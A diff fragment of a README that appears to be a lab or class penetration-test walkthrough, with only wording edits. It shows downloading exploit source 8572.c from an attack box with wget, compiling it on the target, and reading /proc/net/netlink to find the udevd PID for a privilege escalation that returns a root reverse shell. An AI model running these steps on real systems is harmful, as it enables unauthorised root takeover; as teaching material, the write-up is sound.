jjay1288/NetworkAttackProject/README.md

 wget http://192.168.1.210:8080/8572.c
 ```

-​	Then we compile the C code on that target machine into exploit.
+​	Then we compile the C code on the target machine into an executable file.

 ```bash
 gcc -o exploit 8572.c
 ```

 ​	Now we have our payload compiled and ready to run on our target system.
-When we execute it, it will run the code in the "run" file, which instructs the system to call back to our attack box with a bash shell (/bin/bash) that is started with root permissions, providing root access and full control of the system.
+When we execute it, it will execute the code in the "run" file, which instructs the system to call back to our attack box with a reverse bash shell (/bin/bash) that possesses root permissions.

-​	First there are a few more steps.
+​	Before this happens, there are a few more steps.
 The documentation indicated that we need to provide the exploit with the PID of the udevd netlink socket.
 We can find it easily with

 ```bash
 cat /proc/net/netlink